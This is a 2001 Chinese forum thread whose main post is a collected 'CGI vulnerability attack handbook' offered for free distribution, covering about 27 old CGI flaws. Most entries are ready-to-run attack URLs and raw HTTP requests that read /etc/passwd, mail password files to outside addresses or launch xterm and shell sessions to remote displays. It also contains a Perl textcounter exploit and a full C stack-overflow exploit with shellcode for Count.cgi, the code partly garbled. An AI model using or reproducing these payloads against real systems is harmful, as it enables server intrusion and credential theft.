免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 6088 | 回复: 3
打印 上一主题 下一主题

CGI漏洞利用 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2001-11-18 11:08 |只看该作者 |倒序浏览
在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.

一.phf漏洞
  这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:
  lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  但是我们还能找到它吗?

二.php.cgi 2.0beta10或更早版本的漏洞
  可以读nobody权限的所有文件.
  lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
  php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd
  /etc/security/passwd等.

三.whois_raw.cgi
  lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
  lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

四.faxsurvey
  lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

五.textcounter.pl
  如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.
  #!/usr/bin/perl
  $URL='http://dtp.kappa.ro/a/test.shtml';  # please _DO_ _modify_ this
  $EMAIL='pdoru@pop3.kappa.ro,root';      # please _DO_ _modify_ this
  if ($ARGV[0]) {  $CMD=$ARGV[0];}else{
   $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
  }$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\n";
  system({"wget"} "wget", $text, "-O/dev/null"
  system({"wget"} "wget", $text, "-O/dev/null"
  #system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
  #system({"lynx"} "lynx", $text); 

六.一些版本(1.1)的info2www的漏洞
  $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
  $
  You have new mail.
  $
  说实在我不太明白.

七.pfdispaly.cgi
  lynx -source \
  'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
  pfdisplay.cgi还有另外一个漏洞可以执行命令
  lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
  or
  lynx -dump \
  http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

八.wrap
  lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

九.www-sql
  可以让你读一些受限制的页面如:
  在你的浏览器里输入:http://your.server/protected/something.html:
  被要求输入帐号和口令.而有www-sql就不必了:
  http://your.server/cgi-bin/www-sql/protected/something.html:

十.view-source
  lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd
  
十一.campas
  lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

十二.webgais
  telnet www.victim.com 80
  POST /cgi-bin/webgais HTTP/1.0
  Content-length: 85 (replace this with the actual length of the &quot;exploit&quot;line)
  query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&amp;output=subject&amp;domain=paragraph

十三.websendmail
  telnet www.victim.com 80
  POST /cgi-bin/websendmail HTTP/1.0
  Content-length: xxx (should be replaced with the actual length of the
  string passed to the server, in this case xxx=90)
  receiver=;mail+your_address\@somewhere.org</etc/passwd;&amp;sender=a&amp;rtnaddr=a&amp;subject=a&amp;content=a

十四.handler
  telnet www.victim.com 80
  GET /cgi-bin/handler/useless_shit;cat  /etc/passwd|?data=DownloadHTTP/1.0
  or
  GET /cgi-bin/handler/blah;xwsh -display    yourhost.com|?data=Download
  or
  GET /cgi-bin/handler/<tab>;;xterm<tab>;-display<tab>;danish:0<tab>;-e<tab>;/bin/sh|<tab>;?data=Download
  注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.
 
十五.test-cgi
  lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
  CGI/1.0 test script report:

  argc is 0. argv is .

  SERVER_SOFTWARE = NCSA/1.4B
  SERVER_NAME = victim.com
  GATEWAY_INTERFACE = CGI/1.1
  SERVER_PROTOCOL = HTTP/1.0
  SERVER_PORT = 80
  REQUEST_METHOD = GET
  HTTP_ACCEPT = text/plain, application/x-html, application/html,
  text/html, text/x-html
  PATH_INFO =
  PATH_TRANSLATED =
  SCRIPT_NAME = /cgi-bin/test-cgi
  QUERY_STRING = whatever
  REMOTE_HOST = fifth.column.gov
  REMOTE_ADDR = 200.200.200.200
  REMOTE_USER =
  AUTH_TYPE =
  CONTENT_TYPE =
  CONTENT_LENGTH =
  得到一些http的目录
  
  lynx http://www.victim.com/cgi-bin/test-cgi?\help&amp;0a/bin/cat%20/etc/passwd
  这招好象并不管用.
  lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
  还可以这样试
    GET /cgi-bin/test-cgi?* HTTP/1.0
    GET /cgi-bin/test-cgi?x *
    GET /cgi-bin/nph-test-cgi?* HTTP/1.0
    GET /cgi-bin/nph-test-cgi?x *
    GET /cgi-bin/test-cgi?x HTTP/1.0 *
    GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

  
十六.对于某些BSD的apache可以:
  lynx http://www.victim.com/root/etc/passwd
  lynx http://www.victim.com/~root/etc/passwd
 
十七.htmlscript
  lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

十八.jj.c
  The demo cgi program jj.c calls /bin/mail without filtering user
  input, so any program based on jj.c could potentially be exploited by
  simply adding a  followed by a Unix command. It may require a
  password, but two known passwords include HTTPdrocks and SDGROCKS. If
  you can retrieve a copy of the compiled program running strings on it
  will probably reveil the password.

  Do a web search on jj.c to get a copy and study the code yourself if
  you have more questions.

十九.Frontpage extensions
  如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
  和它在服务器上的路径. 还有一些密码文件如:
  http://www.victim.com/_vti_pvt/service.pwd
  http://www.victim.com/_vti_pvt/users.pwd
  http://www.victim.com/_vti_pvt/authors.pwd
  http://www.victim.com/_vti_pvt/administrators.pwd

二十.Freestats.com CGI
  没有碰到过,觉的有些地方不能搞错,所以直接贴英文.
  John Carlton found following.  He developed an exploit for the
  free web stats services offered at freestats.com, and supplied the
  webmaster with proper code to patch the bug.

  Start an account with freestats.com, and log in.  Click on the
  area that says &quot;CLICK HERE TO EDIT YOUR USER PROFILE &amp; COUNTER
  INFO&quot; This will call up a file called edit.pl with your user #
  and password included in it. Save this file to your hard disk and
  open it with notepad.  The only form of security in this is a
  hidden attribute on the form element of your account number.
  Change this from

    *input type=hidden name=account value=your#*

  to

    *input type=text name=account value=&quot;&quot;*

  Save your page and load it into your browser. Their will now be a
  text input box where the hidden element was before. Simply type a
  # in and push the &quot;click here to update user profile&quot; and all the
  information that appears on your screen has now been written to
  that user profile.

  But that isn't the worst of it. By using frames (2 frames, one to
  hold this page you just made, and one as a target for the form
  submission) you could change the password on all of their accounts
  with a simple JavaScript function.

  Deep inside the web site authors still have the good old &quot;edit.pl&quot;
  script. It takes some time to reach it (unlike the path described)
  but you can reach it directly at:

    http://www.sitetracker.com/cgi-bin/edit.pl?account=&amp;password=

二十一.Vulnerability in Glimpse HTTP
  telnet target.machine.com 80
  GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\</etc/passwd;eval$CMD;echo
  HTTP/1.0
二十二.Count.cgi
  该程序只对Count.cgi 24以下版本有效:
  /*### count.c ########################################################*/
  #include <stdio.h>;
  #include <stdlib.h>;
  #include <getopt.h>;
  #include <unistd.h>;
  #include <sys/socket.h>;
  #include <sys/types.h>;
  #include <netinet/in.h>;
  #include <netdb.h>;
  #include <errno.h>;

  /* Forwards */
  unsigned long getsp(int);
  int usage(char *);
  void doit(char *,long, char *);

  /* Constants */
  char sh*ll []=
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;
  &quot;\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30&quot;
  &quot;\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56&quot;
  &quot;\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10&quot;
  &quot;\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf&quot;
  &quot;\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&quot;
  &quot;\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&quot;
  &quot;/usr/X11R6/bin/xterm0-ut0-display0&quot;;
  char endpad[]=
  &quot;\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&quot;
  &quot;\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&quot;;



  int main (int argc, char *argv[]){
   char *sh*ll code = NULL;
   int cnt,ver,retcount, dispnum,dotquads[4],offset;
   unsigned long sp;
   char dispname[255];
   char *host;

   
   offset = sp = cnt = ver = 0;
   fprintf(stderr,&quot;\t%s - Gus\n&quot;,argv[0]);
   if (argc<3) usage(argv[0]);

   while ((cnt = getopt(argc,argv,&quot;h:d:v:&quot) != EOF) {
    switch(cnt){
    case 'h':
     host = optarg;
     break;
    case 'd':
     {
    retcount = sscanf(optarg, &quot;%d.%d.%d.%d:%d&quot;,
       &amp;dotquads[0],
       &amp;dotquads[1],
       &amp;dotquads[2],
       &amp;dotquads[3], &amp;dispnum);
    if (retcount != 5) usage(argv[0]);
    sprintf(dispname, &quot;%03d.%03d.%03d.%03d:%01d&quot;,
    dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
    sh*ll code=malloc(strlen((char *)optarg)+strlen(sh*ll )+strlen(endpad));
    sprintf(sh*ll code,&quot;%s%s%s&quot;,sh*ll ,dispname,endpad);
     }
    break;
    case 'v':
     ver = atoi(optarg);
     break;
    case 'o':
     offset = atoi(optarg);
     break;
    default:
     usage(argv[0]);
     break;
    }
   }
   
   sp = offset + getsp(ver); 


   (void)doit(host,sp,sh*ll code);

   exit(0);
  }

  unsigned long getsp(int ver) {

   /* Get the stack pointer we should be using. YMMV. If it does not work,
     try using -o X, where x is between -1500 and 1500 */
   unsigned long sp=0;
   
   if (ver == 15) sp = 0xbfffea50;
   if (ver == 20) sp = 0xbfffea50;
   if (ver == 22) sp = 0xbfffeab4;
   if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
   if (sp == 0) {
    fprintf(stderr,&quot;I don't have an sp for that version try using the -o option.\n&quot;
    fprintf(stderr,&quot;Versions above 24 are patched for this bug.\n&quot;
    exit(1);
   } else {
    return sp;
   }

  }


  int usage (char *name) {
   fprintf(stderr,&quot;\tUsage:%s -h host -d <display>; -v <version>; [-o <offset>;]\n&quot;,name);
   fprintf(stderr,&quot;\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n&quot;,name);
   exit(1);
  }

  int openhost (char *host, int port) {
   
   int sock;
   struct hostent *he;
   struct sockaddr_in sa;

   he = gethostbyname(host);
   if (he == NULL) {
    perror(&quot;Bad hostname\n&quot;
    exit(-1);
   }

   memcpy(&amp;sa.sin_addr, he->;h_addr, he->;h_length);
   
   sa.sin_port=htons(port);
   sa.sin_family=AF_INET;
   sock=socket(AF_INET,SOCK_STREAM,0);
   if (sock < 0) {
    perror (&quot;cannot open socket&quot;
    exit(-1);
   }
   bzero(&amp;sa.sin_zero,sizeof (sa.sin_zero));

   if (connect(sock,(struct sockaddr *)&amp;sa,sizeof sa)<0) {
    perror(&quot;cannot connect to host&quot;
    exit(-1);
   }
   
   return(sock);
  }


  void doit (char *host,long sp, char *sh*ll code) {

   int cnt,sock;
   char qs[7000];
   int bufsize = 16;
   char buf[bufsize];
   char chain[] = &quot;user=a&quot;;
   
   bzero(buf);
    

   for(cnt=0;cnt<4104;cnt+=4) {
    qs[cnt+0] = sp &amp; 0x000000ff;
    qs[cnt+1] = (sp &amp; 0x0000ff00) >;>; 8;
    qs[cnt+2] = (sp &amp; 0x00ff0000) >;>; 16;
    qs[cnt+3] = (sp &amp; 0xff000000) >;>; 24;
   }
   strcpy(qs,chain);
   qs[strlen(chain)]=0x90;

   qs[4104]= sp&amp;0x000000ff;
   qs[4105]=(sp&amp;0x0000ff00)>;>;8;
   qs[4106]=(sp&amp;0x00ff0000)>;>;16;
   qs[4107]=(sp&amp;0xff000000)>;>;24;
   qs[4108]= sp&amp;0x000000ff;
   qs[4109]=(sp&amp;0x0000ff00)>;>;8;
   qs[4110]=(sp&amp;0x00ff0000)>;>;16;
   qs[4111]=(sp&amp;0xff000000)>;>;24;
   qs[4112]= sp&amp;0x000000ff;
   qs[4113]=(sp&amp;0x0000ff00)>;>;8;
   qs[4114]=(sp&amp;0x00ff0000)>;>;16;
   qs[4115]=(sp&amp;0xff000000)>;>;24;
   qs[4116]= sp&amp;0x000000ff;
   qs[4117]=(sp&amp;0x0000ff00)>;>;8;
   qs[4118]=(sp&amp;0x00ff0000)>;>;16;
   qs[4119]=(sp&amp;0xff000000)>;>;24;
   qs[4120]= sp&amp;0x000000ff;
   qs[4121]=(sp&amp;0x0000ff00)>;>;8;
   qs[4122]=(sp&amp;0x00ff0000)>;>;16;
   qs[4123]=(sp&amp;0xff000000)>;>;24;
   qs[4124]= sp&amp;0x000000ff;
   qs[4125]=(sp&amp;0x0000ff00)>;>;8;
   qs[4126]=(sp&amp;0x00ff0000)>;>;16;
   qs[4127]=(sp&amp;0xff000000)>;>;24;
   qs[4128]= sp&amp;0x000000ff;
   qs[4129]=(sp&amp;0x0000ff00)>;>;8;
   qs[4130]=(sp&amp;0x00ff0000)>;>;16;
   qs[4131]=(sp&amp;0xff000000)>;>;24;
   strcpy((char*)&amp;qs[4132],sh*ll code);

   sock = openhost(host,80);
   write(sock,&quot;GET /cgi-bin/Count.cgi?&quot;,23);
   write(sock,qs,strlen(qs));
   write(sock,&quot; HTTP/1.0\n&quot;,10);
   write(sock,&quot;User-Agent: &quot;,12);
   write(sock,qs,strlen(qs));
   write(sock,&quot;\n\n&quot;,2);
   sleep(1);
    
   /* printf(&quot;GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %s\n\n&quot;,qs,qs); */

   /*
   setenv(&quot;HTTP_USER_AGENT&quot;,qs,1);
   setenv(&quot;QUERY_STRING&quot;,qs,1);
   system(&quot;./Count.cgi&quot;
   */
  }
 
 用Count.cgi看图片
 
 http://attacked.host.com/cgi-bin/Count.cgi?display=image&amp;image=../../../../../../path_to_gif/file.gif


二十三.finger.cgi
  lynx http://www.victim.com/cgi-bin/finger?@localhost
  得到主机上登陆的用户名.
 
二十四.man.sh
   Robert Moniot found followung.  The May 1998 issue of SysAdmin
  Magazine contains an article, &quot;Web-Enabled Man Pages&quot;, which
  includes source code for very nice cgi script named man.sh to feed
  man pages to a web browser.  The hypertext links to other man
  pages are an especially attractive feature.

  Unfortunately, this script is vulnerable to attack.  Essentially,
  anyone who can execute the cgi thru their web browser can run any
  system commands with the user id of the web server and obtain the
  output from them in a web page.

二十五.FormHandler.cgi
  在表格里加上
  <INPUT TYPE=&quot;hidden&quot; NAME=&quot;reply_message_attach&quot; VALUE=&quot;text:/tmp/../etc/passwd&quot;>;
  你的邮箱里就有/etc/passwd

二十六.JFS
  相信大家都看过&quot;JFS 侵入 PCWEEK-LINUX 主机的详细过程&quot;这篇文章,他利用photoads
  这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样
  先lynx &quot;http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&amp;action=done&amp;Country=lala&amp;City=lele&amp;State=a&amp;EMail=lala@hjere.com&amp;Name=%0a1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&amphone=11&amp;Subject=la&amp;password=0&amp;CityStPhone=0&amp;Renewed=0&quot;
  创建新AD值绕过 $AdNum 的检查后用
  lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&amp;AdNum=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&amp;DataFile=1&ampassword=0&amp;FILE_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&amp;FILE_NAME=/lala/\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'
  创建/覆盖用户 nobody 有权写的任何文件.
  不知我的理解是否对,在它的zip包里我找不到to_url脚本,不知哪位同志知道?

二十七.backdoor
  看到现在一些cgichk.c里都有检查木马unlg1.1和rwwwsh*ll .pl
  前一个是UnlG写的,我没见过源码,有一个是THC写的,packetstorm里有它1.6版的源码.



v

论坛徽章:
1
荣誉版主
日期:2011-11-23 16:44:17
2 [报告]
发表于 2001-11-21 21:55 |只看该作者

CGI漏洞利用

这个资料老点阿。
kaka 该用户已被删除
3 [报告]
发表于 2001-11-22 09:11 |只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

论坛徽章:
0
4 [报告]
发表于 2001-11-24 13:42 |只看该作者

CGI漏洞利用

KAKA说的不错.握握手
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP